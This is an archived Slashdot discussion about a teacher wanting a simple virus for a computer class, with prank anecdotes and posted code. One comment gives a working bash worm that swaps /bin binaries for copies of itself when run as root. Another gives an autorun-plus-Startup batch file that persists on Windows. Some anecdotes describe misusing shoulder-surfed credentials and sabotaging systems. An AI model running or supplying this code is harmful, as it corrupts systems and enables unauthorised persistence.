Forgot your password?
typodupeerror
Education Programming Security

Simple Virus For Teaching? 366

Posted by samzenpus
from the my-first-malware dept.
ed1023 writes "Currently I am teaching a 101 class on computers. It is more of a 'demystifying the black box' type of class. The current topic is computer viruses; I am looking for a virus with which I can infect the lab computers (only connected to local network, no outside network connection) that would be easy for the students to remove by hand. Can the Slashdot community point me in any directions? Is there an executable out there that would work, or do I try to write one myself, or is there one that is written that I can compile myself?"
This discussion has been archived. No new comments can be posted.

Simple Virus For Teaching?

Comments Filter:
  • by canyon289 (848746) on Wednesday October 06, 2010 @07:07PM (#33818752)
    What OS are you running? You could create a simple bat script that pops up an annoying message every 20 or 30 minutes to show your students an "infected' machine.
    • Re: (Score:3, Interesting)

      by celardore (844933)

      That reminds me of something I did when I was a bit younger. I was leaving the company that day anyway, and some dude had been bugging me for months. At some time previous I'd shoulder-surfed the IT departments "test" account, which I logged onto on an unused PC in the office. I created a simple .bat file

      start:
      net send annoyingguy "message i wanted"
      goto start:

      Or something along that vein. I can't remember exactly how I made it work, but possibly by leaving the PC on, monitor off, when I left work th

      • Re: (Score:2, Troll)

        by tibit (1762298)

        Two days to run wireshark? LOL.

      • by crisco (4669) on Wednesday October 06, 2010 @07:45PM (#33819130) Homepage
        Back in the late 80s we had a bunch of 10MHz XT clones in a computer lab networked together using Novel and 10BASE2 or maybe even TokenRing. Some of the games we had ran timing loops for the original 4.77 MHz PC so we had some simple TSR that sat on the interrupt timer and ran some NOPs to slow the computers down. I thought it would be a funny prank to add this to the AUTOEXEC.BAT file on most of the boot floppies in the lab, sadly I didn't test it on more than one computer.

        The interrupts and NOPs interfered greatly with the network cards, causing the whole thing to come crashing down when more than a couple of the computers were running at a time. It took at least a couple of days for the sysadmin to sort it out.

        RIP George, thanks for introducing me to the Internet and I'm sorry that you didn't get to stick around for Linux and /. I should have taken your Minix class when I had the chance.

        • by ArsenneLupin (766289) on Thursday October 07, 2010 @03:57AM (#33822022)
          Another fun prank from the DOS days: A TSR program that hooked in the keyboard interrupt, and if it detected that it was called from Turbo Pascal, and that the sequence for compilation was called, it would locate the editor buffer and randomly change a couple of semicolons to colon.

          This was both annoying as hell (plenty of syntax errors), and difficult to positively blame on mischief as:

          • Colon and semicolon are on same key, so easy to blame on typo (phat phingered the shift key)
          • On those crappy monitors that we used back then, it was really difficult to tell colon and semicolon apart

          The TSR was called <shift-space>.com and so a cursory perusal of the autoexec.bat would not reveal its presence, as shift-space just looks like a normal space (... but can be the name of a command)

          IT spend an entire day trying to re-install Turbo Pascal, and the problem still persisted... (because it was in an independent TSR, not in the Turbo Pascal app itself)

          Then, the next day, re-install of the entire system.

          Another fun TSR one was the annoying keyboard beep. The TSR had a timetable of the classes build in, so that the keyboard click would be very short and almost unnoticable at the beginning of the class, and then gradually grew longer and longer during the class (first a faint click, than a more obvious click, and by the end of the hour an annoying beeeeeeeeeep). Fun thing is, as it was gradual, nobody really noticed when/how it started, but eventually that background noise was "just there"...

          A, those were the days of highschool pranks...

      • by Some1too (1242900)
        I had some mod points but i'll waive using them to tell this funny story:

        I worked at a head office for a large oil and gas company in their call centre. One day a net send message popped up on all the computer screens in the office: (I've changed the wording to protect the guilty) "I'm XXX and I like licorice".

        I laughed to myself, clicked ok to the message and then suddenly the phones began to ring off the hook. The amount of callers waiting on hold kept increasing to unimaginable numbers. A few min

        • by KevMar (471257)

          When I was in high school we had a pre-windows PC lab of 15-20 computers and a Mac lab of 12-14 computers. One day I returned to the PC lab at the end of the day for something and I saw the PC teacher and the Mac teacher sitting at a computer. They called me over to them asking if I knew anything about this.

          They told me this computer had a virus and it had my name on it. As soon as they said that, I remembered what I did. I did a net send to all the computers in the PC lab with the message "This is a vi

      • by Nikker (749551)
        Ha! I did something similar but during the first week of my first job after graduation. One of the IT staff was tracking down or attempting to track down an ip and find the hardware. I used the same command to send the pc a message so we could track it down. Feeling cool about everything I started sending "floppy drive on fire" messages to co-workers, little did I know the entire coast to coast operation was running in the same domain so "net send * 'floppy drive on fire'" sent to every office and warehous
        • by arth1 (260657) on Wednesday October 06, 2010 @11:12PM (#33820474) Homepage Journal

          Windows IT guys can be clueless. In a previous job, IT insisted on shutting down my machine and take it away for cleaning because I saved the EICAR test string in cygwin so I could test my Unix boxes' clamav with it. There was no convincing them that the string "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" wasn't a virus.
          Not even my creds as the author of the world's first heuristic AV scanner, nor my certifications were believed, because Symantec Antivirus claimed it was a virus, so it had to be.

          That ITs internal HP printers LCD panels suddenly started displaying "INSERT COIN" had nothing to do with this, I swear.

          • Re: (Score:3, Informative)

            by xandercash (1791710)
            I'm having a similar problem right now. An app I'm working on which does some low level socket networking keeps being flagged by Symantec's active scan as a virus. I'm not sure why, yet, but IT keeps telling me my computer is infected (as discovered by their nightly scans). I've explained more than once that it's an innocuous program that I wrote myself, and have assured them many times that it is NOT a virus. But they believe Symantec over me. It's VERY annoying when I compile the app and Symantec dec
    • by Hojima (1228978)

      What OS are you running?

      This is very important, because if you use a Mac you can't get a virus on it. /joke

    • by arth1 (260657) on Wednesday October 06, 2010 @10:30PM (#33820288) Homepage Journal

      If Linux (or similar), here's an example of a worm that spreads itself on the local host whenever executed as root:

      #!/bin/bash
       
      if [ -O /bin/su ]; then
        mkdir -p /bin/.infected
        TARGET="/bin/ls"
        if [ -e /bin/.infected/ls ]; then
          TARGET=$(for i in $(find /bin -type f -prune); do
            echo 0$RANDOM $i
          done | sort | head -1 | cut -d' ' -f2-)
        fi
        if [ ! -e /bin/.infected/$(basename $TARGET) ]; then
          mv $TARGET /bin/.infected/
          cp $0 $TARGET
        fi
      fi
      ME="$(basename $0)"
      if [ -x /bin/.infected/$ME ]; then
        PATH=/bin/.infected:$PATH
        $ME $*
        if [ $RANDOM -gt 30000 ]; then
          echo "Something wonderful has happened ... your machine is alive"
        fi
      fi

      Save as "virus"
      chmod +x virus ./virus
      rm -f virus

  • Sure (Score:4, Funny)

    by Peach Rings (1782482) on Wednesday October 06, 2010 @07:07PM (#33818758) Homepage

    Here, let me link you to an executable file so you can download it and run it on an entire lab of computers. It's safe, don't worry.

  • EICAR (Score:5, Informative)

    by Anonymous Coward on Wednesday October 06, 2010 @07:07PM (#33818760)

    http://en.wikipedia.org/wiki/EICAR_test_file

    • Re:EICAR (Score:4, Interesting)

      by moonbender (547943) <moonbender@NoSPaM.gmail.com> on Wednesday October 06, 2010 @08:13PM (#33819320)

      The file is simply a text file of either 68 or 70 bytes that is a legitimate executable file called a COM file that can be run by Microsoft operating systems and some work-alikes (except for 64-bit due to 16-bit limitations), including OS/2. When executed, it will print "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!" and then stop. The test string was specifically engineered to consist of ASCII human-readable characters, easily created using a standard computer keyboard. It makes use of self-modifying code to work around technical issues that this constraint makes on the execution of the test string.

      Wow, that's pretty cool. Here's the string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

    • by SQLGuru (980662)

      I'm pretty sure you can find the Melissa virus around somewhere. Mostly benign. http://support.microsoft.com/kb/224567 [microsoft.com]

      Not overly difficult to remove. Isolated to Word. Doesn't do perm. damage.

    • Re:EICAR (Score:5, Informative)

      by yuna49 (905461) on Wednesday October 06, 2010 @11:42PM (#33820628)

      EICAR is detected by all AV products including ClamAV.

      I'd put it in a zip file, then attach the zip to an email message. Show how real viruses propagate by mail. How about putting a copy on a USB pendrive then running eicar.com from Autostart? Any Windows AV product with a decent autoscanner should detect both of these and pop up a warning.

      If you want to get really fancy you can set up a Linux box running MailScanner [mailscanner.info] with ClamAV and send an "EICAR-infected" e-mail message through it. You'll see MailScanner detect the virus, put it in a quarantine, and send notices to the admin and, optionally, the sender.

      For a lay audience I think it's more important to stress the vectors than to concentrate on the payload itself.

      Now if you could only find a site distributing Antivirus 2010. If you do, make sure you're using a Linux machine when you visit the site. If your class understands that there's more to the world than Windows, see how long it takes them to understand why there can't really be an AV program "scanning the C: drive."

      • by yuna49 (905461)

        Oh, how about one more example?

        Put eicar.com on a website, then send an email with a embedded URL and a subject line having to do with nude celebrity videos. You know, the "Hey dude! Wassup! Check out this hot video of Angelina and Brad getting it on!" variety.

        Make sure you craft an HTML version so the URL isn't displayed or use a TinyURL link.

  • by Anonymous Coward
    Windows? Fairly easy to remove.
  • Norton (Score:4, Insightful)

    by cjfs (1253208) on Wednesday October 06, 2010 @07:10PM (#33818786) Homepage Journal
    I don't even know if I'm joking.
  • Note to self... (Score:4, Insightful)

    by tool462 (677306) on Wednesday October 06, 2010 @07:15PM (#33818826)

    Do NOT click on any links posted in the comments on this article.

  • Works on the students, too.
  • Stoned (Score:4, Interesting)

    by PacoSuarez (530275) on Wednesday October 06, 2010 @07:23PM (#33818884)

    Stoned [computerarcheology.com] is a classic and a pleasure to disassemble. It fits in a boot sector (512 bytes) and it's not particularly malicious, but it has all the elements that a virus needs. I don't know if it would still work on a modern computer, though: Some old viruses used funky instructions that became obsolete (like "POP CS"), and this one seems to have issues working on large-capacity disks.

    • IIRC that's a boot sector virus that propagates when a sector read is performed on a floppy drive. Modern labs are pretty unlikely to still have floppy drives. The code to stoned is written in Assembler too, so they would need to be taught that to understand it. They'll also need a good understanding of the old DOS BIOS interupt codes to make sense of what it's doing.

      That's all good for us guys who grew up hacking in the 80s, not so great for the modern ones.

    • by itwerx (165526)

      Or if you really want to get retro, (and remove any risk of propagation by netwok), get some DOS boot disks and the Pakistani Brain Virus.

      (For history buffs: the first "real" PC virus evar, which I hand-disassembled on legal paper so I could write what might have been one of the first virus removal tools - a simple hex edit of the boot sector to skip over its code. :)

      Oh, yeah, and get offa my lawn!

  • Virii all have different signatures, so it doesn't matter what signature you choose.

    Just write a script that pokes something into the registry and adds a funny file to the Windows system directory, and use it on each computer before class.

    Then write a script that pretends to find it and tell them where it is when they run it in class.

    Ask them what they should do next.

    • Re:Fake it. (Score:5, Informative)

      by Missing.Matter (1845576) on Wednesday October 06, 2010 @07:31PM (#33818966)
      The plural of virus is viruses [wikipedia.org]. Just like the plural of abacus is abacuses, not abacai. Viri (or even worse, virii) annoys the hell out of me.
      • Re:Fake it. (Score:4, Informative)

        by blair1q (305137) on Wednesday October 06, 2010 @08:09PM (#33819302) Journal

        Well, if you want to get all prissy about the Latin, then it's incorrect to use the word to describe a single unit of the substance, in the way it's not correct to call a single water molecule "a water". Id est, since a viral program is itself a cell in the viral infection of many computers, there's no term for it other than "viral program" and no term for several of them other than "viral programs". The "virus" would be some arbitrarily bounded subset of the population of said viral programs infecting machines, which could devolve to a single program infecting a single machine, but would still not be the correct term for that program or, indeed, for the viral infection being suffered by that machine. It could correctly refer to the running program and its data (which in most computers includes its instructions) and the progress of its states, but I'm pretty sure nobody much thinks of it that clearly when using the word "virus". Nor is it correct to use "a virus" to refer to a type of virus (exempli gratia Stuxnet, Sasser, Hopper, et cetera) but only to an instance of that type of virus as it is spreading, or, again, some arbitrary subset thereof, wherein it has its physical expression and aggregate, fluid form.

        As for whether it annoys you for people to use a latinate word that is both convenient and apt despite its not being precisely Latin, well, tough titty, because apparently the Latin version of it is a mispronunciation of the Proto-Indo-European word for the same gooey mess, so insisting on going only as far back as Latin for the value of correctness of form is false cognitive closure, and that gives everyone else cause to be annoyed at you.

        • by godrik (1287354)

          hat off.

          PS: I frequently use scenarii which, I learnt recently, should not be used in english.

        • Re:Fake it. (Score:5, Interesting)

          by Internalist (928097) <fred,mailhot&gmail,com> on Thursday October 07, 2010 @01:55AM (#33821390) Homepage

          +5, Informative?...REALLY?!?...

          OK, let's start with a handily recent post on the Language Log [upenn.edu] about Latin plurals (the post is about "syllabus", but "virus/viruses/*viri/**virii" show up in the comments).

          Now, onward...

          Well, if you want to get all prissy about the Latin, then it's incorrect to use the word to describe a single unit of the substance, in the way it's not correct to call a single water molecule "a water".

          Actually (and ignoring the somewhat startling categorisation of computer virus as "substance"), not in the same way at all. You can't call a single molecule of water "a water" because "water" is a mass noun in English, and those don't (i) take indefinite articles, and (ii) don't pluralize nicely (inter alia). It's possible that this portion of your argument comes from here [icrisat.org], which points out that in Latin, "virus" ("poison") was a mass noun. Of course, in English, "virus" is very clearly a count noun in English, since it can be (and overwhelmingly is) used with an indefinite article.

          Id est, since a viral program is itself a cell in the viral infection of many computers, there's no term for it other than "viral program" and no term for several of them other than "viral programs".

          You appear in the preceding to be claiming that the word "virus" doesn't exist in English (or perhaps simply that is has no referent) a claim some information security researchers (and doctors!) might take issue with (cue lambasting for the stranded preposition in 3...2..1 [upenn.edu]).

          That being said, this raises an interesting point about...something. Maybe the type/token distinction? When someone says "I wrote a virus", we take him (or her, I suppose) to be making a claim about an implementation of some specific algorithm in some specific language, but not to any particular token of it.

          The "virus" would be some arbitrarily bounded subset of the population of said viral programs infecting machines, [...]

          I don't understand the grounds on which you're making this claim.

          [...] which could devolve to a single program infecting a single machine, but would still not be the correct term for that program or, indeed, for the viral infection being suffered by that machine. It could correctly refer to the running program and its data (which in most computers includes its instructions) and the progress of its states,

          OK, so the "running program, and its data" counts pretty much as a "single token of the substance" at hand, in my book. So now it sounds like you're contradicting your opening claim.

          but I'm pretty sure nobody much thinks of it that clearly when using the word "virus".

          As I just mentioned, you seem to be contradicting yourself (although I may just be misreading you), so you'll forgive if I take claims of clear thinking only quasi-seriously.

          Nor is it correct to use "a virus" to refer to a type of virus (exempli gratia Stuxnet, Sasser, Hopper, et cetera) [...]

          Why is this 'incorrect'? "I wrote a virus. I'm calling it Johnny5." Seems like a perfectly good use of "a virus" to me.

          [...] but only to an instance of that type of virus as it is spreading, [...]

          Again, isn't this in contradiction to how you started this comment?

          or, again, some arbitrary subset thereof, wherein it has its physical expression and aggregate, fluid form.

          Aside from the impossibility of "some arbitrary subset" of an instance (I'll assume that was just a typo/thinko), now you're just engaged in verbal wankery. I mean, I suppose you might choose to model the spread of contagion in a network of computers as the flow of a kind of flu

  • by CPE1704TKS (995414) on Wednesday October 06, 2010 @07:24PM (#33818908)

    It sounds instructive, but you will probably get fired for lacking good judgement.

    There are plenty of stories where teachers do similar things that end up getting them fired. Teaching students how to write viruses, faking a classroom kidnapping, how to plan a terrorist attack, etc.

    Teaching your students how to write a virus is a classic case of bad judgement. Your superiors will tell you "What were you thinking?" and you will get let go.

    Teach them verbally how viruses are created, but don't assign anything as homework.

    • Re: (Score:3, Insightful)

      by jmottram08 (1886654)
      No where was it mentioned about creating one. Ever. It was mentioned about how to REMOVE one, and to illustrate how they spread.

      It wasn't even mentioned that this is a coding class.

      It is a class about computers, and he wants to teach virus removal.

      Stop being such a lawyer and actually read the summary ffs.

      • Re: (Score:2, Insightful)

        by Anonymous Coward
        He's planning to intentionally infect the school network with a virus as part of a lesson. Sounds like something you get fired for.
        • Re: (Score:2, Informative)

          by Delarth799 (1839672)
          He wants to infect some computers in a lab, that's why the virus cant be one that spreads to other computers so he doesn't infect the whole damn network. Now sure the best thing to do would be setup some computers on just a local LAN that doesn't have any access to the school network but that might not be an option.
      • by gringer (252588) on Wednesday October 06, 2010 @09:59PM (#33820058)

        No where was it mentioned about creating one. Ever.... actually read the summary ffs.

        I think you may have missed this part of the summary:

        do I try to write one my self

        • by L4t3r4lu5 (1216702) on Thursday October 07, 2010 @03:11AM (#33821812)
          Yes, because he wants to make sure the "fake" virus he uses for the removal exercise doesn't contain some hidden, actually damaging, payload.

          Someone has already suggested the EICAR test file, which is ideal. It pops up a message box, and is easy to remove. He can add links the various windows startup files, the registry, he can go old school and call it from a batch file, and he's safe in the knowledge that he's in no danger of hosing his systems.

          Nowhere in the stub did he say he was going to teach the kids about actually writing the virus they were to remove. Reading comprehension fail.
      • by Aranykai (1053846)

        Not illustrate, demonstrate. Which, while I don't share the extreme views of the GP, I think is likely to come back to bite you. These people don't know what a script is, showing them a "psuedo-virus" isn't going to substantially enlighten them, nor enhance their lives in any meaningful way. Move on to useful things and spend more time on those.

    • At my university, we have a computer security lab just for this purpose. It's completely isolated from the internet and the campus network, with all computers, servers, switches, etc. available for student access.

      As with all dangerous things, the key is to make everyone aware of the dangers and the consequences, and then closely supervise them. A lab course I took actually required us to use plutonium for neutron activation. As far as dangerous things go, that's on the top of the list. But we wore film badg

    • by vxice (1690200)
      actually in the article he makes it clear he wants to infect a computer to show students how to remove it. Still is risking it, especially since it is normally a simple procedure to remove a virus with an anti virus program.
    • by X0563511 (793323)

      He's not asking how to teach them to write a virus...

      Please (re?)read the post...

    • by hoggoth (414195)

      Sure... he is teaching his computer newbs how to WRITE a virus in a 'demystify computers' class. And next period in health they will be designing the DNA of a retrovirus.

    • >Let's not do an instructive simulation of a common computer anomaly, lest some tech-retarded administrator punish you for being a good teacher.

    • Re: (Score:2, Interesting)

      by axismundi (997660)
      I wrote a virus in middleschool (Windows 3.1 and DOS) which I showed to a friend, who infected some girl's computer. Turns out her computer belonged to her dad's small business. The ensuing shit-show of confused administrations, criminal charges, civil threats and pissed parents ended with a restraining order on ME and apparently some trouble for the "exploratory program" administrator, who at some point allowed me to use a computer, though it was most certainly not in any way involved with my extracurric
  • Go fish... (Score:3, Informative)

    by clone53421 (1310749) on Wednesday October 06, 2010 @07:25PM (#33818924) Journal

    Just pick any of the scores of .exe files masquerading as cracks on LimeWire. You’ll have to turn off the AV and executable file filter to download it, of course...

  • No matter how safe is the OS they are using, or what antivirus they have to run there, the biggest risk is on the other side of the keyboard. Show them the Good Times "virus", a bit of social engineering is easier to be seen than abstract code.
  • Obviously, you should know exactly what it is that the virus is doing. No, not approximately: I mean all the way down to the machine instruction level. If it comes only in a binary, disassemble and figure out everything. Use virtual machines to add a layer of protection, and be aware that some malware knows it's being run in a VM and may behave differently under these conditions. Of course, those are much more than you need.

    The safest bet is to write your own. That way, you know what it's doing.

  • Try this instead. (Score:5, Interesting)

    by neiras (723124) on Wednesday October 06, 2010 @07:40PM (#33819076)

    What do you expect a student to learn from being told "there is a virus on this machine, remove it by hand"?

    If they are in the "demystifying the black box" phase, they have no idea what you're talking about.

    Teach them that viruses are just programs like Word or Excel, except with a specific malicious purpose. Give them an overview of how a machine or user might be tricked into running malicious software. Teach them about how malicious software might propagate. Use historical examples. Talk about privileges.

    Virus is a slang term that brings up all kinds of scare reactions in ordinary people. They immediately assume that machines are vulnerable to bacteria floating around on the wind, or something similar. You need to de-emphasize the term "virus". It's just software. Then teach them that 99% of all malicious software runs on Windows, and that it's a reflection of the number of vulnerabilities in Windows code and market share.

    Write a simple program that copies itself to the Windows folder and starts itself at boot. The program should show an alert box saying "HACKED BY PROFESSOR HANDSOME!!!!" if it sees it is being run from the Windows folder. Put it on a USB key with an autorun.ini, tell them you have placed a virus you wrote on there, and let them sort it out. Just be sure you're on an XP machine and that autorun is enabled.

    Better yet, email the .exe to the entire class. Call it CS101-Example.exe, and use the harmless infection to talk about social engineering. Then take them through the 'infection' process, and show them how to remove the file by hand.

    • by trampel (464001)

      Somebody please mod parent up!

    • by Barny (103770)

      Yeah, about writing a small virus, you do know that a lot of the early virus were written without thought to their global spread (best example is the morris worm), and that if your particular one gets out, no matter how innocent, it will be a federal felony to have done that? Worth your job? No.

      Best bet would be for the parent to officially contact an AV company and ask them, they will be able to give professional advice and possibly even live code (but I doubt that, would likely need to go looking for one

  • Write your own? (Score:5, Informative)

    by rwa2 (4391) * on Wednesday October 06, 2010 @07:40PM (#33819078) Homepage Journal

    It's Windows, so it's easy... just create a CD or USB drive with two files:

    autorun.inf :
    [autorun]
                open=installpopup.bat

    installpopup.bat :
    cmd.exe /k echo "Hi I am a virus"
    copy installpopup.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"

    Bonus is that it has plenty of legitimate uses for system automation for your little script kiddies as well.

    • by Anonymous Coward on Wednesday October 06, 2010 @08:29PM (#33819422)

      if UAC is enabled, Explorer is not running with privileges that can write to the All Users profile.

      For that matter, this will fail on any system where the profile directory isn't in "C:\Documents and Settings", which includes any non-English OS.

      Use

      copy installpopup.bat "%userprofile%\Start Menu\Programs\Startup" instead

      • by rwa2 (4391) *

        if UAC is enabled, Explorer is not running with privileges that can write to the All Users profile.

        For that matter, this will fail on any system where the profile directory isn't in "C:\Documents and Settings", which includes any non-English OS.

        Use

        copy installpopup.bat "%userprofile%\Start Menu\Programs\Startup" instead

        Thanks! I'm by no means a Windows guru, nor have anything other than my corporate WinXP box to test on :P

      • by GF678 (1453005)

        That script will also fail if, like we do, Autorun is (sensibly) disabled using Group Policy. If it isn't then I'd go talking to your IT department as to why not. :)

    • by poor_boi (548340)

      Instead of

      "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"

      Use

      "%ALLUSERSPROFILE%\Start Menu\Programs\Startup"

      or to avoid Vista/W7 UAC issues:

      "%USERPROFILE%\Start Menu\Programs\Startup"

  • Perhaps a better learning experience would be to connect the lab (or a handful of the students own computers) to the Internet, and stick a box running Snort (www.snort.org) with Emerging Threats (www.emergingthreats.net) signatures in between. If, by some miracle (or the fact that they're all Mac's) you don't have any immediate indicators of infection, then head on over to teh Googles and search for 'smiley tool bar' or 'free porn' with the I'm-Feeling-Lucky button. That ought to do the trick.

    Get a full p

  • A friend of mine who taught at a community college actually did this back in the mid 90s. He took a copy of Nowhere Man's Virus Creation Lab and tossed together a couple annoying but non-destructive viruses and infected a few stand alone machines for the students to play with.

    You can probably still find VCL out there, or a more modern DIY virus kit. Though with the new ones, I'm not sure I would trust they don't have any hidden functionality.

  • You don't want an actual virus. Viruses are becoming less common, they are now the delivery vector more than anything. Most of my badware experience in the last year or three has been exploits, generally server-hosted and browser-targetting. Malware is the payload and payday, that's where the action is. Malware is also typically the user-facing component as well.

    Go find Antivirus 2009, or the most recent respin of that godawful thing. It's fairly straightforward to remove, fairly obvious when it's present,

    • One of my relatives PCs got some really nasty malware recently that pretended to be antivirus software and would halt any action taken by the user with a popup saying the thing you were doing (Taskmanager.exe and the like) was infected. It implied you had to pay $30 to buy the 'full version' of the software to fix it, and the only way to pay was with a credit card. I have never seen a more aggressive piece of software and I had no idea how to fix it other than a boot from CD reformat. Scary stuff :\

      • by RMingin (985478)

        That certainly sounds familiar. It's most likely the newest variant. There have been easily a dozen major updates of Antivirus XP, they've been nasty to remove.

        It *is* possible to remove it, though, and even without reinstall. The real trick is getting a wedge under it to start with, because it's very tenacious until then.

  • It might be caught by modern browsers, but if you turn off all the security features (or just load up IE5 or something like that), you might be able to pull the one where you open an html document (with embedded javascript for the "virus" portion) and it, in turn, opens up two copies of itself. Those two each open two copies, and so on and so forth, until you've brought your machine to a screeching halt with the glut of windows opening up.

    Easy to fix, too. Just manually shut down the machine (either hard po

  • Create a batch file with a shady sort of name

    You can use a simple command like >> start iexplore -k "error.htm"

    Use http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html [cnet.com] to convert the file to an executable. Have your students run the file so that it opens the error page in IE kiosk mode.(Annoying enough to not have a "Close" button) Demonstrate how open windows can be tracked to their parent process(error.htm is opened by sh4dY.exe) from within task manager. Hunt down and term
  • If you wanted to teach students about viruses and had a Win 98 system or any system that has DOS you could do really simple demos. A nice sounding batch file with a format command would be a start. Once the students understand that even primitive programmers can create malware easily then you might show them some of the scripts that people plug into their own programs to cause devastation. Next might be to explain that advanced programmers and even governments can write really sinister viruses but t

  • Who are they going to blame?

    I can picture that bright, inquisitive kids (and maybe of the few bad apples too) get a hold of a virus and create a copy of it / upload it to a server / save it to a usb drive, and then it gets out and infects other school computers, then guess who's door they're going to knock on?

    Yes, there's plenty of ways that kids can get virus code on their own. But there's a big difference between when a kid picks up a loaded gun from home, vs getting one from the teacher, and hoping that

  • It was filled with people who barely knew how to work a television remote, let alone use a computer. I think you might be wasting your time...

  • "Demystifying computers" - teaching them how to remove a virus isn't going to do that.

    Teach them how a computer actually works - if they don't know what's normal, how the heck are they supposed to recognize when something is wrong?

    Besides, if they're too stupid to recognize what's normal by now (like they've never really used a computer before), you're wasting your time "demystifying computers." If they're too old, or too young, you're again wasting your time. Perhaps we should send you to Soviet Russ

    • Why?

      Nobody's too old to want to learn new tricks. Nobody's too young for an introduction to computers (provided they have the motor skills to use one). Plenty of people get discouraged from learning things about their computers---like how to fix them---precisely because of that attitude. So they call up their nephews and brother-in-laws and don't ever bother with it: many are perfectly capable and intelligent people, but they never learn because they assume they'll screw it up. Which they will, if they neve

  • Bad idea (Score:4, Insightful)

    by FlyByPC (841016) on Wednesday October 06, 2010 @08:45PM (#33819526) Homepage
    This sort of thing is exactly what the "whatcouldpossiblygowrong" tag is for. I'm surprised it hasn't shown up yet...
  • by mrflash818 (226638) on Wednesday October 06, 2010 @08:47PM (#33819542) Homepage Journal

    ...if they know of a good virus candidate?

    http://www.clamav.net/ [clamav.net]

  • This so reminds me of Monkey.B which was a virus running rampant years ago on DOS machines. If you can get an old box, load dos or win95/98 on it you can dload Monkey.B and it will be easy to see. Just go to BIOS settings and your hard drive size chs will all be changed. Simple removal as well.
  • write it yourself (Score:3, Interesting)

    by jamesh (87723) on Wednesday October 06, 2010 @09:10PM (#33819690)

    Write it yourself. The fact that you would even consider this without thinking about the potential for it to be a serious Career Limiting Move means that it should be a fun ride :)

    Seriously though, install XP at some base service pack level - sp1 or sp2 might do, then connect it to the internet without any firewall. The viruses will find you.

    But you could have a bit more fun than that. Write an exe file that simply pops up a "if this was a virus you'd be pwn3d by now" message. Then pick one of the popular kids in the class (lets call her Jane Smith), and send an email around to your whole class from an anonymous hotmail account (or some service that allows sending exe files) with a subject of "Ha Ha. Look at what Jane Smith got up to last night." and include the exe file with a message "pics attached". Fail everyone who opens it. You'll probably still lose your job due to the idiots they put in power, but at least you'll have taught your class a lesson (the lesson being "if you're a teacher, it pays not to think for yourself".)

    You don't say what the age of your students is. If it's a university or TAFE level class you might get away with it, but you only have to offend one daddy's girl and it's all over.

  • Hand them an OS installation CD. Tell them how once a machine is owned, you don't know how far, so back up data and restart from scratch. Done.
  • and please don't ever try and teach a medical class

  • Create a virus that overwrites the MBR making the computer non-bootable.
  • The answer is simple. Find the person in your class who is smarter than you (you should recognize him/her. You were that person when you were in school), and give him the chance to shine that the a-hole professor never gave you.
  • Cripe I'm old. I remember when writing a worm was an AI project. I also remember when air was clean and sex was dirty. It was all a long time ago...

    Give them something entertaining and instructive to do: Introduce them to Core Wars. Modern viruses have little or nothing in common with EICAR any more. You could introduce almost all the concepts of a Comp 101 class through good Core Wars competition.

As in certain cults it is possible to kill a process if you know its true name. -- Ken Thompson and Dennis M. Ritchie

Working...